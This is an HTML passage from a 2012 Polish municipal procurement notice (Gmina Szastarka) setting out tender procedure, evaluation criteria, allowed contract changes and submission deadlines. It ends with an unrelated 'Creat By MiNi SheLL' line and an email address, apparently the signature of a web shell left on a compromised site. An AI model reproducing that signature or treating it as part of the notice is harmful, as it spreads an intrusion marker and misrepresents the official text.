3	Dokumenty te są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii poświadczonej       za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski sporządzonym przez tłumacza przysięgłego.
4	Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów określonych w pkt 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności siły wyższej, 
bw zapisach umowy dotyczących wartości umowy w przypadku zmian w umowie  o dofinansowanie projektu, niemożliwych do przewidzenia na etapie opracowywania SIWZ, a które to będą wywoływały konieczność zmiany zapisów umowy. 
3. Zmiany danych dotyczących stron, innych osób wskazanych imiennie w umowie, nie będą traktowane jako zmiany Umowy i będą dokonywane w formie jednostronnego oświadczenia Strony, której zmiana dotyczy, złożonego na piśmie pod rygorem nieważności. 
4. Zmiany umowy, o których mowa w ust. 2, nie mogą powodować zwiększenia wartości umowy, o której mowa    w § 6 ust. 1 umowy. 
5. Z tytułu niniejszej umowy Wykonawca nie nabywa żadnych uprawnień pracowniczych przewidzianych przepisami Kodeksu Pracy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaszastarka.pl bip zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Szastarka Gminny Zespół Obsługi Placówek Oświatowych, w dniach i godzinach pracy urzędu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 09:00, miejsce: sekretariat,pokój nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com